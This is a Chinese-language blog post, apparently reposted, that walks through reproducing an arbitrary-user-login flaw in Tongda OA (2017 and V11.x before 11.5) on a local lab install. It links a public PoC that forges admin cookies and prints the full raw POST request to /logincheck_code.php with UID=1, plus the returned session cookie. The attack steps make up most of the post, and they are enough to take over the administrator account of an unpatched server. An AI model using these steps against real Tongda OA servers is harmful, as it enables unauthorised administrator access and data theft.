内容简介:通达OA 2017版通达OA V11.X<V11.5
影响版本
通达OA 2017版
通达OA V11.X<V11.5
环境搭建
安装包来自黑白之道(https://mp.weixin.qq.com/s/moxuMnaqzXg-tZ7_2oLxbQ)
下载安装包后一键安装即可
链接:
https://pan.baidu.com/s/1eel1BxEc0XE4PqlA7y7-Tw
提取码:ilj1
安装过程很简单故不再赘述
漏洞复现
初始用户:admin 密码:空
访问localhost可以看到登陆页面
说明我们环境已经ok了
我们可以先登陆进去,发现管理员后台地址都是如下格式
http://网站/general/index.php?isIE=0&modify_pwd=0
我们可以看到我们直接访问这个网址会显示我们没有登陆
然后我们利用poc生成我们的cookie并进行替换
Poc地址: https://github.com/NS-Sp4ce/TongDaOA-Fake-User
通过poc生成我们的cookie
来到我们之前的那个链接,打开F12进行cookie的替换
替换完之后重新刷新一下
可以看到我们成功的利用cookie登陆了进来
手动复现
访问 /general/login_code.php
获取返回的code_uid 注意注意!!这里要把cookie删除掉不然是无法获得道Set-Cookie 同时 要更换User-Agent!!
Post 发包
CODEUID=上一个数据包的code_uid&UID=1
数据包如下
POST /logincheck_code.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 104
Upgrade-Insecure-Requests: 1
Content-Length: 52
CODEUID={B33EE507-314D-EC90-6258-10D33F800BC9}&UID=1
返回包中的cookie
Set-Cookie: PHPSESSID=0ni6eptuu3595vlfan1aii61v4; path=/
源码分析
后面会补上
以上所述就是小编给大家介绍的《通达OA任意用户登陆漏洞复现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- HQChart 1.9695 版本发布,分时图增加通达信集合竞价图
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
- Ghost Tunnel复现
- Paxos与“幽灵复现”
- CVE-2010-3333漏洞复现
- CVE-2017-12149漏洞复现
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
快速转行做产品经理
李三科 / 华中科技大学出版社 / 2018-6-1 / 39.90
互联网已经进入以产品为中心的时代,不懂技术一样做高薪产品经理。本书将满足你转行、就业、加薪的愿望。 . 作者李三科,互联网资深产品经理。2011年离开传统销售行业进入互联网行业工作,从对产品经理的工作一无所知,到成长为一名年薪几十万的资深产品经理,他对产品经理职业有着深刻的理解,也积累了丰富的学习、工作经验。本书以作者亲身经历为线索,讲解学习产品经理相关知识和工作方法的经验,同时介绍求......一起来看看 《快速转行做产品经理》 这本书的介绍吧!